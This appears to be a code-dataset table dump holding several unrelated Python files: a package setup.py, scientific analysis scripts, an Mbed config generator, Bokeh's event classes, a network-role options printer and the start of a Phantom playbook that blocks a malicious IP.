ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b414fbc399ff388c71367fab273d13c0fd7146ef | from setuptools import setup, find_namespace_packages
from typing import List
from pathlib import Path
import re
setup_requires = [
'setuptools>=54.2.0',
]
install_requires = [
'aiohttp~=3.7.4',
'aiotusclient~=0.1.4',
'appdirs~=1.4.4',
'async_timeout>=3.0',
'attrs>=21.2',
'click>=8.0.1',
'colorama>=0.4.4',
'humanize>=3.1.0',
'janus>=0.6.1',
'multidict>=5.1.0',
'python-dateutil>=2.8.2',
'PyYAML~=5.4.1',
'rich~=10.5.0',
'tabulate>=0.8.9',
'tqdm>=4.61',
'yarl>=1.6.3',
'backend.ai-cli~=0.5.0.post1',
]
build_requires = [
'wheel>=0.36.2',
'twine>=3.4.2',
'towncrier>=21.3.0',
]
test_requires = [
'pytest~=6.2.4',
'pytest-cov',
'pytest-mock',
'pytest-asyncio>=0.15.1',
'aioresponses>=0.7.2',
'codecov',
]
lint_requires = [
'flake8>=3.9.2',
'flake8-commas>=2.1',
]
typecheck_requires = [
'mypy>=0.910',
'types-click',
'types-python-dateutil',
'types-tabulate',
]
dev_requires: List[str] = [
# 'pytest-sugar>=0.9.1',
]
docs_requires = [
'Sphinx~=3.4.3',
'sphinx-intl>=2.0',
'sphinx_rtd_theme>=0.4.3',
'sphinxcontrib-trio>=1.1.0',
'sphinx-autodoc-typehints~=1.11.1',
'pygments~=2.7.4',
]
def read_src_version():
path = (Path(__file__).parent / 'src' /
'ai' / 'backend' / 'client' / '__init__.py')
src = path.read_text(encoding='utf-8')
m = re.search(r"^__version__ = '([^']+)'$", src, re.MULTILINE)
assert m is not None, 'Could not read the version information!'
return m.group(1)
setup(
name='backend.ai-client',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=read_src_version(),
description='Backend.AI Client for Python',
long_description=Path('README.rst').read_text(encoding='utf-8'),
url='https://github.com/lablup/backend.ai-client-py',
author='Lablup Inc.',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Operating System :: POSIX',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Environment :: No Input/Output (Daemon)',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
],
package_dir={'': 'src'},
packages=find_namespace_packages(where='src', include='ai.backend.*'),
python_requires='>=3.8',
setup_requires=setup_requires,
install_requires=install_requires,
extras_require={
'dev': dev_requires,
'build': build_requires,
'test': test_requires,
'lint': lint_requires,
'typecheck': typecheck_requires,
'docs': docs_requires,
},
data_files=[],
package_data={
'ai.backend.client': ['py.typed'],
},
entry_points={
'backendai_cli_v10': [
'_ = ai.backend.client.cli.main:main',
],
},
)
|
py | b414fc414b482abac8fbaf567a27322775fb7aa2 | # Ref: http://alyssaq.github.io/2014/understanding-hough-transform/
def hough_transform_line(image):
img = image.copy()
ro, theta = 0, 0
# Step 1
img = cv2.Canny(img, 50, 200, 3)
# Step 2
thetas = np.deg2rad(np.arange(-90.0, 90.0))
w, h = img.shape
max_ro = int(np.ceil(w * w + h * h))
ros = np.linspace(-max_ro, max_ro, max_ro * 2.0)
cos = np.cos(thetas)
sin = np.sin(thetas)
# Step 3
accumulator = np.zeros((2 * max_ro, len(thetas)), dtype=np.uint64)
y, x = np.nonzero(img)
# Step 4
for i in range(len(x)):
for j in range(len(thetas)):
ro = int(round(x[i] * cos[j] + y[i] * sin[j]) + max_ro)
accumulator[ro, j] += 1
i = np.argmax(accumulator)
ro = ros[int(round(i / accumulator.shape[1]))]
theta = thetas[int(round(i % accumulator.shape[1]))]
return ro, theta, accumulator
|
py | b414fd048cff6b5933479727287d26c363cc9991 | # -*- coding: utf-8 -*-
import numpy as np
from scipy.spatial import cKDTree
def rdf_2d(pts, nb_bin=100):
r_in = 0.2
r_out = 0.5
r_min = 1e-6
r_max = r_out - r_in
dr = 0.01 # 1.0 / (20*np.sqrt(nb_bin))
print(20 * np.sqrt(nb_bin))
radius = np.arange(r_min, r_max + dr, dr)
distance = np.sqrt(pts[:, 0] ** 2 + pts[:, 1] ** 2)
pts_in = pts[np.where(distance <= r_in)] # pts for measurement
pts_out = pts[np.where(distance <= r_out)] # pts to evaluate
nb_pts_in = pts_in.shape[0]
density = pts.shape[0]
# Compute pairwise correlation for each inner particle pts_in
pairwise = np.asarray([np.sqrt((pt - pts_out)[:, 0] ** 2 + (pt - pts_out)[:, 1] ** 2) for pt in pts_in]).flatten()
pairwise = pairwise[np.where(pairwise <= radius[-1])]
g, bins = np.histogram(pairwise, bins=radius)
normalization = 2 * np.pi * radius[:-1] * dr * nb_pts_in * density
rdf = g / normalization
rdf[0] = 1.0
return rdf, radius[:-1]
def rdf2d(particles, dr, rho=None, eps=1e-15):
particles = particles - np.min(particles, axis=0)
min_x, min_y = np.min(particles, axis=0)
max_x, max_y = np.max(particles, axis=0)
# dimensions of box
w, h = (max_x - min_x), (max_y - min_y)
r_max = (np.min([w, h]) / 2) * 0.8
radii = np.arange(dr, r_max, dr)
g_r = np.zeros(shape=(len(radii)))
nb_pts = len(particles)
if not rho:
rho = nb_pts / (w * h) # number density
# create a KDTree for fast nearest-neighbor lookup of particles
tree = cKDTree(particles)
for r_idx, r in enumerate(radii):
# find all particles that are at least r + dr away from the edges of the box
valid_id = (particles[:, 0] - (r + dr) >= min_x) & (particles[:, 0] + (r + dr) <= max_x) \
& (particles[:, 1] - (r + dr) >= min_y) & (particles[:, 1] + (r + dr) <= max_y)
valid_particles = particles[valid_id]
# compute n_i(r) for valid particles.
for particle in valid_particles:
n = tree.query_ball_point(particle, r + dr - eps, return_length=True) \
- tree.query_ball_point(particle, r, return_length=True)
g_r[r_idx] += n
# normalize
n_valid = len(valid_particles)
shell_vol = np.pi * ((r + dr) ** 2 - r ** 2)
g_r[r_idx] /= n_valid * shell_vol * rho
return radii, g_r
|
py | b414fd153e648c439885b18b620f0b729e142557 | #
# Copyright (c) 2020-2021 Arm Limited and Contributors. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Parses the Mbed configuration system and generates a CMake config script."""
import pathlib
from typing import Any
from mbed_tools.lib.json_helpers import decode_json_file
from mbed_tools.project import MbedProgram
from mbed_tools.targets import get_target_by_name
from mbed_tools.build._internal.cmake_file import render_mbed_config_cmake_template
from mbed_tools.build._internal.config.assemble_build_config import assemble_config
from mbed_tools.build._internal.write_files import write_file
from mbed_tools.build.exceptions import MbedBuildError
def generate_config(target_name: str, toolchain: str, program: MbedProgram) -> pathlib.Path:
"""Generate an Mbed config file at the program root by parsing the mbed config system.
Args:
target_name: Name of the target to configure for.
toolchain: Name of the toolchain to use.
program: The MbedProgram to configure.
Returns:
Path to the generated config file.
"""
targets_data = _load_raw_targets_data(program)
target_build_attributes = get_target_by_name(target_name, targets_data)
config = assemble_config(target_build_attributes, program.root, program.files.app_config_file)
cmake_file_contents = render_mbed_config_cmake_template(
target_name=target_name, config=config, toolchain_name=toolchain,
)
cmake_config_file_path = program.files.cmake_config_file
write_file(cmake_config_file_path, cmake_file_contents)
return cmake_config_file_path
def _load_raw_targets_data(program: MbedProgram) -> Any:
targets_data = decode_json_file(program.mbed_os.targets_json_file)
if program.files.custom_targets_json.exists():
custom_targets_data = decode_json_file(program.files.custom_targets_json)
for custom_target in custom_targets_data:
if custom_target in targets_data:
raise MbedBuildError(
f"Error found in {program.files.custom_targets_json}.\n"
f"A target with the name '{custom_target}' already exists in targets.json. "
"Please give your custom target a unique name so it can be identified."
)
targets_data.update(custom_targets_data)
return targets_data
|
py | b414fd7f27d5da4a7992c3a0973ab71f4163e448 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Represent granular events that can be used to trigger callbacks.
Bokeh documents and applications are capable of supporting various kinds of
interactions. These are often associated with events, such as mouse or touch
events, interactive downsampling mode activation, widget or tool events, and
others. The classes in this module represent these different events, so that
callbacks can be attached and executed when they occur.
It is possible to respond to events with ``CustomJS`` callbacks, which will
function with or without a Bokeh server. This can be accomplished by passing
and event class, and a ``CustomJS`` model to the
:func:`~bokeh.model.Model.js_on_event` method. When the ``CustomJS`` is
executed in the browser, its ``cb_obj`` argument will contain the concrete
event object that triggered the callback.
.. code-block:: python
from bokeh.events import ButtonClick
from bokeh.models import Button, CustomJS
button = Button()
button.js_on_event(ButtonClick, CustomJS(code='console.log("JS:Click")'))
Alternatively it is possible to trigger Python code to run when events
happen, in the context of a Bokeh application running on a Bokeh server.
This can accomplished by passing an event class, and a callback function
to the the :func:`~bokeh.model.Model.on_event` method. The callback should
accept a single argument ``event``, which will be passed the concrete
event object that triggered the callback.
.. code-block:: python
from bokeh.events import ButtonClick
from bokeh.models import Button
button = Button()
def callback(event):
print('Python:Click')
button.on_event(ButtonClick, callback)
.. note ::
There is no throttling of events. Some events such as ``MouseMove``
may trigger at a very high rate.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from .util.future import with_metaclass
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'ButtonClick',
'DoubleTap',
'Event',
'LODStart',
'LODEnd',
'MenuItemClick',
'MouseEnter',
'MouseLeave',
'MouseMove',
'MouseWheel',
'Pan',
'PanEnd',
'PanStart',
'Pinch',
'PinchEnd',
'PinchStart',
'Rotate',
'RotateEnd',
'RotateStart',
'PlotEvent',
'PointEvent',
'Press',
'Reset',
'SelectionGeometry',
'Tap',
)
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
_CONCRETE_EVENT_CLASSES = dict()
class _MetaEvent(type):
''' Metaclass used to keep track of all classes subclassed from Event.
All Concrete Event classes (i.e. not "abstract" event base classes with
no ``event_name``) will be added to the _CONCRETE_EVENT_CLASSES set which
is used to decode event instances from JSON.
'''
def __new__(cls, clsname, bases, attrs):
newclass = super(_MetaEvent, cls).__new__(cls, clsname, bases, attrs)
if newclass.event_name is not None:
_CONCRETE_EVENT_CLASSES[newclass.event_name] = newclass
return newclass
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Event(with_metaclass(_MetaEvent, object)):
''' Base class for all Bokeh events.
This base class is not typically useful to instantiate on its own.
'''
_event_classes = []
event_name = None
def __init__(self, model):
''' Create a new base event.
Args:
model (Model) : a Bokeh model to register event callbacks on
'''
self._model_id = None
if model is not None:
self._model_id = model.id
@classmethod
def decode_json(cls, dct):
''' Custom JSON decoder for Events.
Can be used as the ``object_hook`` argument of ``json.load`` or
``json.loads``.
Args:
dct (dict) : a JSON dictionary to decode
The dictionary should have keys ``event_name`` and ``event_values``
Raises:
ValueError, if the event_name is unknown
Examples:
.. code-block:: python
>>> import json
>>> from bokeh.events import Event
>>> data = '{"event_name": "pan", "event_values" : {"model_id": 1, "x": 10, "y": 20, "sx": 200, "sy": 37}}'
>>> json.loads(data, object_hook=Event.decode_json)
<bokeh.events.Pan object at 0x1040f84a8>
'''
if not ('event_name' in dct and 'event_values' in dct):
return dct
event_name = dct['event_name']
if event_name not in _CONCRETE_EVENT_CLASSES:
raise ValueError("Could not find appropriate Event class for event_name: %r" % event_name)
event_values = dct['event_values']
model_id = event_values.pop('model_id')
event = _CONCRETE_EVENT_CLASSES[event_name](model=None, **event_values)
event._model_id = model_id
return event
class ButtonClick(Event):
''' Announce a button click event on a Bokeh button widget.
'''
event_name = 'button_click'
def __init__(self, model):
from .models.widgets import AbstractButton
if model is not None and not isinstance(model, AbstractButton):
msg ='{clsname} event only applies to button models'
raise ValueError(msg.format(clsname=self.__class__.__name__))
super(ButtonClick, self).__init__(model=model)
class MenuItemClick(Event):
''' Announce a button click event on a Bokeh menu item.
'''
event_name = 'menu_item_click'
def __init__(self, model, item=None):
self.item = item
super(MenuItemClick, self).__init__(model=model)
class PlotEvent(Event):
''' The base class for all events applicable to Plot models.
'''
def __init__(self, model):
from .models import Plot
if model is not None and not isinstance(model, Plot):
msg ='{clsname} event only applies to Plot models'
raise ValueError(msg.format(clsname=self.__class__.__name__))
super(PlotEvent, self).__init__(model=model)
class LODStart(PlotEvent):
''' Announce the start of "interactive level-of-detail" mode on a plot.
During interactive actions such as panning or zooming, Bokeh can
optionally, temporarily draw a reduced set of the data, in order to
maintain high interactive rates. This is referred to as interactive
Level-of-Detail (LOD) mode. This event fires whenever a LOD mode
has just begun.
'''
event_name = 'lodstart'
class LODEnd(PlotEvent):
''' Announce the end of "interactive level-of-detail" mode on a plot.
During interactive actions such as panning or zooming, Bokeh can
optionally, temporarily draw a reduced set of the data, in order to
maintain high interactive rates. This is referred to as interactive
Level-of-Detail (LOD) mode. This event fires whenever a LOD mode
has just ended.
'''
event_name = 'lodend'
class SelectionGeometry(PlotEvent):
''' Announce the coordinates of a selection event on a plot.
Attributes:
geometry (dict) : a dictionary containing the coordinates of the
selection event.
final (bool) : whether the selection event is the last selection event
in the case of selections on every mousemove.
'''
event_name = "selectiongeometry"
def __init__(self, model, geometry=None, final=True):
self.geometry = geometry
self.final = final
super(SelectionGeometry, self).__init__(model=model)
class Reset(PlotEvent):
''' Announce a button click event on a plot ``ResetTool``.
'''
event_name = "reset"
def __init__(self, model):
super(Reset, self).__init__(model=model)
class PointEvent(PlotEvent):
''' Base class for UI events associated with a specific (x,y) point.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
Note that data space coordinates are relative to the default range, not
any extra ranges, and the the screen space origin is at the top left of
the HTML canvas.
'''
event_name = None
def __init__(self, model, sx=None, sy=None, x=None, y=None):
self.sx = sx
self.sy = sy
self.x = x
self.y = y
super(PointEvent, self).__init__(model=model)
class Tap(PointEvent):
''' Announce a tap or click event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'tap'
class DoubleTap(PointEvent):
''' Announce a double-tap or double-click event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'doubletap'
class Press(PointEvent):
''' Announce a press event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'press'
class MouseEnter(PointEvent):
''' Announce a mouse enter event onto a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
The enter event is generated when the mouse leaves the entire Plot
canvas, including any border padding and space for axes or legends.
'''
event_name = 'mouseenter'
class MouseLeave(PointEvent):
''' Announce a mouse leave event from a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
The leave event is generated when the mouse leaves the entire Plot
canvas, including any border padding and space for axes or legends.
'''
event_name = 'mouseleave'
class MouseMove(PointEvent):
''' Announce a mouse movement event over a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event can fire at a very high rate, potentially increasing network
traffic or CPU load.
'''
event_name = 'mousemove'
class MouseWheel(PointEvent):
''' Announce a mouse wheel event on a Bokeh plot.
Attributes:
delta (float) : the (signed) scroll speed
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
By default, Bokeh plots do not prevent default scroll events unless a
``WheelZoomTool`` or ``WheelPanTool`` is active. This may change in
future releases.
'''
event_name = 'wheel'
def __init__(self, model, delta=None, **kwargs):
self.delta = delta
super(MouseWheel, self).__init__(model, **kwargs)
class Pan(PointEvent):
''' Announce a pan event on a Bokeh plot.
Attributes:
delta_x (float) : the amount of scroll in the x direction
delta_y (float) : the amount of scroll in the y direction
direction (float) : the direction of scroll (1 or -1)
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'pan'
def __init__(self, model, delta_x=None, delta_y=None, direction=None, **kwargs):
self.delta_x = delta_x
self.delta_y = delta_y
self.direction = direction
super(Pan, self).__init__(model, **kwargs)
class PanEnd(PointEvent):
''' Announce the end of a pan event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'panend'
class PanStart(PointEvent):
''' Announce the start of a pan event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'panstart'
class Pinch(PointEvent):
''' Announce a pinch event on a Bokeh plot.
Attributes:
scale (float) : the (signed) amount of scaling
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'pinch'
def __init__(self, model, scale=None, **kwargs):
self.scale = scale
super(Pinch, self).__init__(model, **kwargs)
class PinchEnd(PointEvent):
''' Announce the end of a pinch event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'pinchend'
class PinchStart(PointEvent):
''' Announce the start of a pinch event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'pinchstart'
class Rotate(PointEvent):
''' Announce a rotate event on a Bokeh plot.
Attributes:
rotation (float) : the rotation that has been done (in deg)
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'rotate'
def __init__(self, model, rotation=None, **kwargs):
self.rotation = rotation
super(Rotate, self).__init__(model, **kwargs)
class RotateEnd(PointEvent):
''' Announce the end of a rotate event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'rotateend'
class RotateStart(PointEvent):
''' Announce the start of a rotate event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'rotatestart'
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
py | b414fe133ca862412666a07b905ab221f7a644a8 | import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
plt.rcParams.update({'font.size': 12})
plt.rcParams["figure.figsize"] = (8,3)
NUM_EXPS = 5
GRAPH_FORMAT = 'pdf'
# GRAPH_TITLE = 'Piano Playing'
# GRAPH_FILE = 'piano_playing'
GRAPH_TITLE = 'Keyboard Typing'
GRAPH_FILE = 'keyboard_typing'
SUBJECTS_NAMES = ['01', '04', '05', '06', '10', '17', '19', '20', '21', '23', '24', '25']
if GRAPH_FILE == 'piano_playing':
exp_folders = ['/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_13_st0.8_sequence_reslayer_retrained_mp_4qloss_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_14_st0.8_sequence_reslayer_retrained_mp_4qloss_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_15_st0.8_sequence_reslayer_retrained_mp_4qloss_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_16_st0.8_sequence_reslayer_retrained_mp_4qloss_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_17_st0.8_sequence_reslayer_retrained_mp_4qloss_kf3']
else:
exp_folders = ['/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_23_st0.8_sequence_reslayer_retrained_mt_4qloss_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_24_st0.8_sequence_reslayer_retrained_mt_4qloss_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_25_st0.8_sequence_reslayer_retrained_mt_4qloss_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_26_st0.8_sequence_reslayer_retrained_mt_4qloss_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_27_st0.8_sequence_reslayer_retrained_mt_4qloss_kf3']
# append all k-fold experiments folders for all subjects
rec_dict, pre_dict = {x:[] for x in SUBJECTS_NAMES}, {x:[] for x in SUBJECTS_NAMES}
for i, exp_dir in enumerate(exp_folders):
for j, subject_name in enumerate(SUBJECTS_NAMES):
subject_metric_df = pd.read_csv(os.path.join(exp_dir, f'metrics_full_df_r{subject_name}.csv'))
rec_dict[subject_name].append(subject_metric_df['rec'].dropna().values)
pre_dict[subject_name].append(subject_metric_df['pre'].dropna().values)
# compute mean and std for each of the subjects
for j, subject_name in enumerate(SUBJECTS_NAMES):
rec_dict[subject_name] = [np.concatenate(rec_dict[subject_name]).mean(), np.concatenate(rec_dict[subject_name]).std()]
pre_dict[subject_name] = [np.concatenate(pre_dict[subject_name]).mean(), np.concatenate(pre_dict[subject_name]).std()]
# plot graph
eps = 5e-2
for j, subject_name in enumerate(SUBJECTS_NAMES):
# plot recall
plt.scatter(j, rec_dict[subject_name][0], marker='^', s=80, color='gold')
lower_bound = max(0, rec_dict[subject_name][0] - rec_dict[subject_name][1])
upper_bound = min(1, rec_dict[subject_name][0] + rec_dict[subject_name][1])
plt.plot([j,j], [lower_bound, upper_bound], color='gold')
plt.text(j+.04, rec_dict[subject_name][0]+.03, str(round(rec_dict[subject_name][0], 3)), fontsize=12, color='darkgoldenrod')
# plot precision
plt.scatter(j + eps, pre_dict[subject_name][0], marker='v', s=80, color='cornflowerblue')
lower_bound = max(0, pre_dict[subject_name][0] - pre_dict[subject_name][1])
upper_bound = min(1, pre_dict[subject_name][0] + pre_dict[subject_name][1])
plt.plot([j + eps,j + eps], [lower_bound, upper_bound], color='cornflowerblue')
plt.text(j+.04, pre_dict[subject_name][0]-.07, str(round(pre_dict[subject_name][0], 3)), fontsize=12, color='royalblue')
colors = ['gold', 'cornflowerblue']
lines = [Line2D([0], [0], color=c, linewidth=3, linestyle='-') for c in colors]
labels = ['Recall', 'Precision']
plt.legend(lines, labels, loc='lower right')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.xticks(range(len(SUBJECTS_NAMES)), range(1, len(SUBJECTS_NAMES)+1))
plt.title(GRAPH_TITLE)
plt.grid(True)
plt.tight_layout(pad=0.05)
plt.savefig(os.path.join("metrics_subjects_cigraph_{}.{}".format(GRAPH_FILE, GRAPH_FORMAT)))
|
py | b414fe48618d9cec46f913a9fcc147e184897f2a | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Optimization test packages """
from .optimization_test_case import QiskitOptimizationTestCase
__all__ = ['QiskitOptimizationTestCase']
|
py | b414fe8be3b2b852664df7cc26fd2ef2bd927c48 | #!/usr/bin/python3 -tt
# SPDX-License-Identifier: BSD-3-Clause
# Helper to print all options that the module in the network role accepts for
# profiles
from collections.abc import Mapping
from collections.abc import Sequence
from copy import deepcopy
from unittest import mock
import os
import sys
PRIORITIES = (
"name",
"type",
"interface_name",
"mac",
"state",
"persistent_state",
"controller",
"port_type",
"parent",
"ignore_errors",
"force_state_change",
"check_iface_exists",
"autoconnect",
"wait",
"zone",
"mtu",
"ip",
"ethernet",
"ethtool",
"bridge",
"bond",
"team",
"vlan",
"wireless",
"macvlan",
"infiniband",
)
import yaml
parentdir = os.path.normpath(os.path.join(os.path.dirname(__file__), ".."))
with mock.patch.object(
sys,
"path",
[parentdir, os.path.join(parentdir, "module_utils/network_lsr")] + sys.path,
):
with mock.patch.dict(
"sys.modules",
{"ansible": mock.Mock(), "ansible.module_utils": __import__("module_utils")},
):
import argument_validator as av
COMMENT = "@@"
EMPTY = "/EMPTY/"
def parse_validator(validator):
default = validator.default_value
if isinstance(validator, av.ArgValidatorDict):
res = {}
for k, v in validator.nested.items():
if (
v.name
not in (
"infiniband_transport_mode",
"infiniband_p_key",
"vlan_id",
)
and not isinstance(v, av.ArgValidatorDeprecated)
):
name = k
if not validator.required:
pass
# name += " DICT optional"
res[name] = parse_validator(v)
elif isinstance(validator, av.ArgValidatorList):
res = [parse_validator(validator.nested)]
elif isinstance(validator, av.ArgValidatorNum):
minval = validator.val_min
maxval = validator.val_max
comment = f" {COMMENT}"
if not validator.required:
comment += " optional"
if minval is not None:
comment += " mininum=" + str(minval)
if maxval:
if maxval == 0xFFFFFFFF:
maxval = hex(maxval)
comment += " maximum=" + str(maxval)
if default is not None:
res = str(default)
elif minval is not None:
res = str(minval)
elif maxval is not None:
res = str(maxval)
else:
res = ""
res += comment
elif isinstance(validator, av.ArgValidatorIP):
res = f"{EMPTY} {COMMENT} IP Address"
elif isinstance(validator, av.ArgValidatorStr):
if default:
res = default
elif validator.enum_values:
res = "|".join(validator.enum_values)
else:
res = EMPTY
if not validator.required:
res += f" {COMMENT} optional"
# res += " " + str(validator.__class__)
elif isinstance(validator, av.ArgValidatorBool):
if default is not None:
res = "yes" if default else "no"
else:
res = "yes|no"
if not validator.required:
res += f" {COMMENT} optional"
else:
res = validator.name + f" {COMMENT} FIXME " + str(validator.__class__)
return res
def represent_dict(dumper, data):
"""
Represent dictionary with insert order
"""
value = []
for item_key, item_value in data.items():
node_key = dumper.represent_data(item_key)
node_value = dumper.represent_data(item_value)
value.append((node_key, node_value))
return yaml.nodes.MappingNode("tag:yaml.org,2002:map", value)
def priority_sorted(data):
if isinstance(data, Sequence) and not isinstance(data, str):
return [priority_sorted(item) for item in data]
if isinstance(data, Mapping):
sorted_data = {}
for key in sorted(data, key=prioritize):
sorted_data[key] = priority_sorted(data[key])
return sorted_data
return deepcopy(data)
def prioritize(key):
try:
priority = PRIORITIES.index(key)
except ValueError:
priority = len(PRIORITIES)
return (priority, key)
yaml.add_representer(dict, represent_dict)
sorted_data = priority_sorted([parse_validator(av.ArgValidator_DictConnection())])
yaml_example = (
yaml.dump(
sorted_data,
explicit_start=True,
default_flow_style=False,
width=100,
)
.replace(COMMENT, "#")
.replace(EMPTY, "")
)
# yaml_example = re.sub(r"# ([^:]*):", r": # \1", yaml_example)
print(yaml_example)
|
py | b414fec00105ce67465f95c11805a283ba75a1bc | import phantom.rules as phantom
import json
#
# Copyright (c) 2016 World Wide Technology, Inc.
# All rights reserved.
#
# author: Joel W. King, World Wide Technology
#
def on_start(container):
# call 'run_job_1' block
run_job_1(container)
return
def run_job_1(container, filtered_artifacts=None, filtered_results=None):
# collect data for 'run_job_1' call
container_data = phantom.collect2(container=container, datapath=['artifact:*.cef.sourceAddress', 'artifact:*.id'])
parameters = []
# build parameters list for 'run_job_1' call
for container_item in container_data:
parameters.append({
'dead interval': 300,
'extra vars': 'malicious_ip=%s' % container_item[0],
'job template id': "Remotely Triggered Black Hole",
# context (artifact id) is added for action results to be associated with the artifact
'context':{'artifact_id': container_item[1]},
})
print "parameters:%s" % parameters
if parameters:
